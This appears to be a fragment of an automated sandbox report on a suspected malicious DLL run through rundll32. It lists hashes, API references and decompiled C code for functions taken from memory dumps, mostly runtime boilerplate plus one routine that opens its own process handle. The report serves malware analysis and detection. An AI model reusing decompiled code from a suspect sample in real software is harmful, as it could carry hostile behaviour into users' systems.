Opcode Fuzzy Hash: 9e49cac7386bf5329d0d93d8699a96d9403be2861f98b0bfdfdc0e04b17f6300
Instruction Fuzzy Hash: F601C035A0051A8FCB05DBE4C864AFE77BDAF84314F280919E811AB280CF349AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19908B, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199092
std::_Lockit::_Lockit.LIBCPMT ref: 6E19909C
std::_Facet_Register.LIBCPMT ref: 6E1990ED
std::_Lockit::~_Lockit.LIBCPMT ref: 6E19910D

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: e8fc847f41f4fd8c5cf65b4cbdb6c8c78b70aadd4da66afa3a070ccb7fc953f6
Instruction ID: 857a36f2ed671de1a3cf20e651f656c133df87466ab4c38e8023f070a43b368e
Opcode Fuzzy Hash: e8fc847f41f4fd8c5cf65b4cbdb6c8c78b70aadd4da66afa3a070ccb7fc953f6
Instruction Fuzzy Hash: 3B01D635A0011A9FCB05DBE4C928AFD777DBF95324F244819E821AB280CF359AC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1998B1, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1998B8
std::_Lockit::_Lockit.LIBCPMT ref: 6E1998C2
std::_Facet_Register.LIBCPMT ref: 6E199913
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199933

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 7d2aeb0342e9574ca8e475b7cd1e017c1fbf5073b5a12c737b66aa62069d201b
Instruction ID: cfa45a500bc7539d7bc3f3cd895dc6ddd334d744c3be93c1c3ee13246da88bdf
Opcode Fuzzy Hash: 7d2aeb0342e9574ca8e475b7cd1e017c1fbf5073b5a12c737b66aa62069d201b
Instruction Fuzzy Hash: 2301D635A00229DFCF05DBE4C864AFE77B9AF84314F244819E911AB280CF3099C4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199120, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E199127
std::_Lockit::_Lockit.LIBCPMT ref: 6E199131
std::_Facet_Register.LIBCPMT ref: 6E199182
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1991A2

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: 259611a0a81ae67e2994118404b99557e69d562cba63560f5cf24315049cfb7a
Instruction ID: c8bc42894fbf45b4e746cd9021823980d768bff9ae9d8a76996701db8287e144
Opcode Fuzzy Hash: 259611a0a81ae67e2994118404b99557e69d562cba63560f5cf24315049cfb7a
Instruction Fuzzy Hash: 7101A135A005159FCF05DBE4D8246FE77A9BF84324F244819E815AB280CF719EC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1991B5, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E1991BC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1991C6
std::_Facet_Register.LIBCPMT ref: 6E199217
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199237

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$Lockit$Facet_H_prolog3Lockit::_Lockit::~_Register
String ID:
API String ID: 477323864-0
Opcode ID: ffdd013d2406f0b61d4cc966072eed4e6b4d15e6edd4b1dea9c64a2f56d6f8bf
Instruction ID: d6b66b6adfb652e5ce4050366fa8e97829aad5162ff4ed65cdec3f9817120acf
Opcode Fuzzy Hash: ffdd013d2406f0b61d4cc966072eed4e6b4d15e6edd4b1dea9c64a2f56d6f8bf
Instruction Fuzzy Hash: EB01C43590011A9FCF05DBE4C864AFD77B9AF84714F254859E821AB280CF3099C8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E161850, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x6e164130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e16413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x6e16412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e164128 = _t5;
						 *0x6e164130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e164124 = _t6;
						if(_t6 == 0) {
							 *0x6e164124 =  *0x6e164124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E16164B,74B063F0), ref: 6E16185F
GetVersion.KERNEL32 ref: 6E16186E
GetCurrentProcessId.KERNEL32 ref: 6E161885
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E16189E

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 3df187235d91e544a5295fddc5c543bba03251bd51208823a1a7d7a0d80f2e5e
Instruction ID: c1acf36d23d190c8b0fc631c75b192a67c15ccf32a1271a8e389209536e27402
Opcode Fuzzy Hash: 3df187235d91e544a5295fddc5c543bba03251bd51208823a1a7d7a0d80f2e5e
Instruction Fuzzy Hash: 05F0AF70754A209AEFC19FA8A8297B93BB8F757712F20C255E548C61C4D37090CBBB18

Uniqueness

Uniqueness Score: -1.00%

Function 6E16111A, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E16111A(void* __ecx, char _a4) {
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				if(SetThreadAffinityMask(_t13, 1) != 0) {
					SetThreadPriority(_t13, 0xffffffff);
				}
				_t4 = E6E16163F(_a4);
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e161123
0x6e161136
0x6e16113b
0x6e16113b
0x6e161141
0x6e161146
0x6e16114a
0x6e16114e
0x6e16114e
0x6e161158
0x6e161161

APIs

GetCurrentThread.KERNEL32 ref: 6E16111D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E161128
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6E16113B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E16114E

Memory Dump Source

Source File: 00000006.00000002.521506374.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000006.00000002.521496666.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521512708.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.521521840.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.521526623.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e1ac75c5b8d19e693a7c9df3cafa164882cfe1cc779b22de714391a3b5f927ca
Instruction ID: 8d259148f935ca0c99059f45bce4ba9aa80687fc1bda8bb6cbd6b01432aebb5c
Opcode Fuzzy Hash: e1ac75c5b8d19e693a7c9df3cafa164882cfe1cc779b22de714391a3b5f927ca
Instruction Fuzzy Hash: 25E092313066116BAA416A694C88E6F676CEFD2331B118235F524D22D0CB649C5BA6A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E6B4D, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000), ref: 6E1E6B64
GetLastError.KERNEL32(?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000,?,00000000,?,6E1D5D03,?), ref: 6E1E6B70

Part of subcall function 6E1E6B36: CloseHandle.KERNEL32(6E218970,6E1E6B80,?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000,?,00000000), ref: 6E1E6B46

___initconout.LIBCMT ref: 6E1E6B80

Part of subcall function 6E1E6AF8: CreateFileW.KERNEL32(6E1FBA3C,40000000,00000003,00000000,00000003,00000000,00000000,6E1E6B27,6E1E3448,00000000,?,6E1D579E,?,6E1C3E83,00000000,?), ref: 6E1E6B0B

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,6E1E345B,00000000,00000001,00000000,00000000,?,6E1D579E,?,6E1C3E83,00000000,?), ref: 6E1E6B95

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction ID: d97d8df498956f06a3ea0116ce9f6a935fcdc9b55cb856018c40bd61c93195b1
Opcode Fuzzy Hash: 9cd0102a64f72d3f3948e3eec6bfde0637a6faaf472fde0dd8ac2b89d388fe34
Instruction Fuzzy Hash: 7EF01C3A620918BBCF625FD1CC089CD3F26FB093A1B448411FF1895520CB32C9A0EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D02A7, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1D06AC
_free.LIBCMT ref: 6E1D0701

Strings

-, xrefs: 6E1D054F

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: _free
String ID: -
API String ID: 269201875-2547889144
Opcode ID: 65daf1475057c036405d936e95806a8598965a469124cf7f5f1703d4165e6d75
Instruction ID: 0b4f0d3992dac66cebda40b9651f50a4ff68908df7e418c9d3e282059d06460c
Opcode Fuzzy Hash: 65daf1475057c036405d936e95806a8598965a469124cf7f5f1703d4165e6d75
Instruction Fuzzy Hash: 85C1047190021A9BDB60DFA4CC50BEE73BAFF65704F2045AAD819D7180FB319AC8EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CAE6D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6E1CAEFD

Strings

pow, xrefs: 6E1CAED5, 6E1CAEF2

Memory Dump Source

Source File: 00000006.00000002.521546110.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 3fc0550d98fe204db2bc6543187e1fe56d152fee132fe4f09c23f10ac71cec07
Instruction ID: e359c573bc0cf9da538cc5f5c2c92d3f17efc07f75a5fee2beeb247947ad61ea
Opcode Fuzzy Hash: 3fc0550d98fe204db2bc6543187e1fe56d152fee132fe4f09c23f10ac71cec07
Instruction Fuzzy Hash: C4518DA161C5029ACB03AAD4C97039E37E49BA1F00F708E58E496C619CEB7D48D9F6C7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6176 Parent PID: 6092 rundll32.exeCOMMON

Executed Functions

Function 6E1A9B76, Relevance: 12.1, APIs: 8, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1A9B76(void* __edx, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				E6E1AA7D0(0x6e216838, 0x10);
				_t34 =  *0x6e2217c4; // 0x1
				if(_t34 > 0) {
					 *0x6e2217c4 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E6E1A96E2();
					 *(_t80 - 4) = 1;
					__eflags =  *0x6e2217a0 - 2;
					if( *0x6e2217a0 != 2) {
						E6E1AA3EC(_t67, 1, _t73, 7);
						asm("int3");
						E6E1AA7D0(0x6e216860, 0xc);
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E6E1A9D31( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E6E1A9A1C(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(__eflags != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(__eflags == 0) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_push(_t70);
									_push( *((intOrPtr*)(_t80 + 8)));
									_t42 = E6E17D580(_t57, _t70, _t74, __eflags);
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(__eflags == 0) {
											_push(_t57);
											_push(_t42);
											_push( *((intOrPtr*)(_t80 + 8)));
											_t45 = E6E17D580(_t57, _t70, _t74, __eflags);
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E1A9B76(_t67, _t25);
											_pop(_t60);
											E6E1A9D31( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E6E1A9A1C(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E6E1A9D31( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x6e2217c4 - _t70; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E6E1A97AD(_t60);
						E6E1AA8CC();
						E6E1AA92D();
						 *0x6e2217a0 =  *0x6e2217a0 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E6E1A9C0B();
						_t54 = E6E1A994E(_t60,  *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E6E1A9C18();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 6E1A9BBD
___scrt_uninitialize_crt.LIBCMT ref: 6E1A9BD7

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 5330e8f9a53b38e0a2f46355bf09568b6880469df51fd80e04492b4ab533fa62
Instruction ID: e9baa49ad2d71118058f3f29df3f28bc3bf290fc470eaf4321163746bfdfad5f
Opcode Fuzzy Hash: 5330e8f9a53b38e0a2f46355bf09568b6880469df51fd80e04492b4ab533fa62
Instruction Fuzzy Hash: B041F776D04619AFDB11CFDCE850BFE7AB9EF80754F214419EA156B240C73249C1ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9C26, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6E1A9C26(void* __edx, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t34;
				void* _t36;
				void* _t39;
				signed int _t40;
				signed int _t42;
				void* _t44;
				void* _t49;

				_t39 = __edx;
				E6E1AA7D0(0x6e216860, 0xc);
				_t40 =  *(_t44 + 0xc);
				if(_t40 != 0) {
					L3:
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					__eflags = _t40 - 1;
					if(_t40 == 1) {
						L6:
						_t34 =  *(_t44 + 0x10);
						_t42 = E6E1A9D31( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *(_t44 - 0x1c) = _t42;
						__eflags = _t42;
						if(_t42 == 0) {
							L16:
							 *(_t44 - 4) = 0xfffffffe;
							_t24 = _t42;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
							return _t24;
						}
						_t25 = E6E1A9A1C(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
						_t42 = _t25;
						 *(_t44 - 0x1c) = _t42;
						__eflags = _t42;
						if(__eflags == 0) {
							goto L16;
						}
						L8:
						_t42 = E6E17D580(_t34, _t40, _t42, __eflags,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *(_t44 - 0x1c) = _t42;
						__eflags = _t40 - 1;
						if(_t40 == 1) {
							__eflags = _t42;
							if(__eflags == 0) {
								_t29 = E6E17D580(_t34, _t40, _t42, __eflags,  *((intOrPtr*)(_t44 + 8)), _t26, _t34);
								__eflags = _t34;
								_t14 = _t34 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E1A9B76(_t39, _t14);
								_pop(_t36);
								E6E1A9D31( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
							}
						}
						__eflags = _t40;
						if(_t40 == 0) {
							L13:
							_t42 = E6E1A9A1C(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
							 *(_t44 - 0x1c) = _t42;
							__eflags = _t42;
							if(_t42 != 0) {
								_t42 = E6E1A9D31( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
								 *(_t44 - 0x1c) = _t42;
							}
							goto L16;
						} else {
							__eflags = _t40 - 3;
							if(_t40 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t40 - 2;
					if(__eflags == 0) {
						goto L6;
					}
					_t34 =  *(_t44 + 0x10);
					goto L8;
				}
				_t49 =  *0x6e2217c4 - _t40; // 0x1
				if(_t49 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6e1a9c26
0x6e1a9c2d
0x6e1a9c32
0x6e1a9c37
0x6e1a9c48
0x6e1a9c48
0x6e1a9c4c
0x6e1a9c4f
0x6e1a9c5b
0x6e1a9c5b
0x6e1a9c68
0x6e1a9c6a
0x6e1a9c6d
0x6e1a9c6f
0x6e1a9d18
0x6e1a9d18
0x6e1a9d1f
0x6e1a9d21
0x6e1a9d24
0x6e1a9d30
0x6e1a9d30
0x6e1a9c7a
0x6e1a9c7f
0x6e1a9c81
0x6e1a9c84
0x6e1a9c86
0x00000000
0x00000000
0x6e1a9c8c
0x6e1a9c96
0x6e1a9c98
0x6e1a9c9b
0x6e1a9c9e
0x6e1a9ca0
0x6e1a9ca2
0x6e1a9ca9
0x6e1a9cae
0x6e1a9cb0
0x6e1a9cb0
0x6e1a9cb6
0x6e1a9cb7
0x6e1a9cbc
0x6e1a9cc2
0x6e1a9cc2
0x6e1a9ca2
0x6e1a9cc7
0x6e1a9cc9
0x6e1a9cd0
0x6e1a9cda
0x6e1a9cdc
0x6e1a9cdf
0x6e1a9ce1
0x6e1a9ced
0x6e1a9d15
0x6e1a9d15
0x00000000
0x6e1a9ccb
0x6e1a9ccb
0x6e1a9cce
0x00000000
0x00000000
0x00000000
0x6e1a9cce
0x6e1a9cc9
0x6e1a9c51
0x6e1a9c54
0x00000000
0x00000000
0x6e1a9c56
0x00000000
0x6e1a9c56
0x6e1a9c39
0x6e1a9c3f
0x00000000
0x00000000
0x6e1a9c41
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6E1A9C63
dllmain_crt_dispatch.LIBCMT ref: 6E1A9C7A
dllmain_raw.LIBCMT ref: 6E1A9CC2
dllmain_crt_dispatch.LIBCMT ref: 6E1A9CD5
dllmain_raw.LIBCMT ref: 6E1A9CE8

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6dee2fdb2fe5cdcda32d08f8573217e900afa5b6af788149448fa8acb4a09677
Instruction ID: 1d3f9184089c0f3c08532412a14e0f8784980008682851074bf2aa987facd479
Opcode Fuzzy Hash: 6dee2fdb2fe5cdcda32d08f8573217e900afa5b6af788149448fa8acb4a09677
Instruction Fuzzy Hash: 0E21D876D0061AAFCB62CEDDD8509BF3AB9DB90794F214415F9146B214C3328DC1ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9A6F, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E1A9A6F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				char _t84;
				signed int _t85;
				void* _t88;
				void* _t89;
				void* _t101;
				void* _t105;
				signed int _t109;
				void* _t112;
				signed int _t114;
				signed int _t118;
				intOrPtr* _t120;
				void* _t122;

				_t104 = __edx;
				_t88 = __ecx;
				E6E1AA7D0(0x6e216818, 0x10);
				_t43 = E6E1A97DD(_t88, __edx, 0);
				_pop(_t89);
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t122 - 0x1d)) = E6E1A96E2();
					_t84 = 1;
					 *((char*)(_t122 - 0x19)) = 1;
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					_t131 =  *0x6e2217a0;
					if( *0x6e2217a0 != 0) {
						E6E1AA3EC(_t104, _t105, _t112, 7);
						asm("int3");
						E6E1AA7D0(0x6e216838, 0x10);
						_t48 =  *0x6e2217c4; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6e2217c4 = _t48 - 1;
							 *(_t122 - 0x1c) = 1;
							 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
							 *((char*)(_t122 - 0x20)) = E6E1A96E2();
							 *(_t122 - 4) = 1;
							__eflags =  *0x6e2217a0 - 2;
							if( *0x6e2217a0 != 2) {
								E6E1AA3EC(_t104, 1, _t112, 7);
								asm("int3");
								E6E1AA7D0(0x6e216860, 0xc);
								_t109 =  *(_t122 + 0xc);
								__eflags = _t109;
								if(_t109 != 0) {
									L23:
									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										L26:
										_t85 =  *(_t122 + 0x10);
										_t114 = E6E1A9D31( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
										 *(_t122 - 0x1c) = _t114;
										__eflags = _t114;
										if(_t114 != 0) {
											_t55 = E6E1A9A1C(_t89,  *((intOrPtr*)(_t122 + 8)), _t109, _t85); // executed
											_t114 = _t55;
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t114;
											if(__eflags != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t109 - 2;
										if(__eflags == 0) {
											goto L26;
										} else {
											_t85 =  *(_t122 + 0x10);
											L28:
											_t114 = E6E17D580(_t85, _t109, _t114, __eflags,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
											 *(_t122 - 0x1c) = _t114;
											__eflags = _t109 - 1;
											if(_t109 == 1) {
												__eflags = _t114;
												if(__eflags == 0) {
													_t59 = E6E17D580(_t85, _t109, _t114, __eflags,  *((intOrPtr*)(_t122 + 8)), _t56, _t85);
													__eflags = _t85;
													_t34 = _t85 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t89);
													E6E1A9D31( *((intOrPtr*)(_t122 + 8)), _t114, _t85);
												}
											}
											__eflags = _t109;
											if(_t109 == 0) {
												L33:
												_t114 = E6E1A9A1C(_t89,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
												 *(_t122 - 0x1c) = _t114;
												__eflags = _t114;
												if(_t114 != 0) {
													_t114 = E6E1A9D31( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
													 *(_t122 - 0x1c) = _t114;
												}
											} else {
												__eflags = _t109 - 3;
												if(_t109 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t122 - 4) = 0xfffffffe;
									_t54 = _t114;
								} else {
									__eflags =  *0x6e2217c4 - _t109; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
								return _t54;
							} else {
								E6E1A97AD(_t89);
								E6E1AA8CC();
								E6E1AA92D();
								 *0x6e2217a0 =  *0x6e2217a0 & 0x00000000;
								 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
								E6E1A9C0B();
								_t67 = E6E1A994E(_t89,  *((intOrPtr*)(_t122 + 8)), 0);
								asm("sbb esi, esi");
								_t118 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t118;
								 *(_t122 - 0x1c) = _t118;
								 *(_t122 - 4) = 0xfffffffe;
								E6E1A9C18();
								_t69 = _t118;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
							return _t69;
						}
					} else {
						 *0x6e2217a0 = 1;
						if(E6E1A973F(_t131) != 0) {
							E6E1AA8C0(E6E1AA901());
							E6E1AA8DE();
							_t80 = E6E1CEDAA(0x6e1ee200, 0x6e1ee21c); // executed
							_pop(_t101);
							if(_t80 == 0 && E6E1A9714(1, _t101, __fp0) != 0) {
								E6E1CED65(_t101, 0x6e1ee1bc, 0x6e1ee1fc); // executed
								 *0x6e2217a0 = 2;
								_t84 = 0;
								 *((char*)(_t122 - 0x19)) = 0;
							}
						}
						 *(_t122 - 4) = 0xfffffffe;
						E6E1A9B52();
						if(_t84 != 0) {
							goto L11;
						} else {
							_t120 = E6E1AA8FB();
							_t137 =  *_t120;
							if( *_t120 != 0) {
								_push(_t120);
								if(E6E1A989D(_t137) != 0) {
									 *0x6e1ee1b4( *((intOrPtr*)(_t122 + 8)), 2,  *(_t122 + 0xc));
									 *((intOrPtr*)( *_t120))();
								}
							}
							 *0x6e2217c4 =  *0x6e2217c4 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
						return _t44;
					}
				}
			}

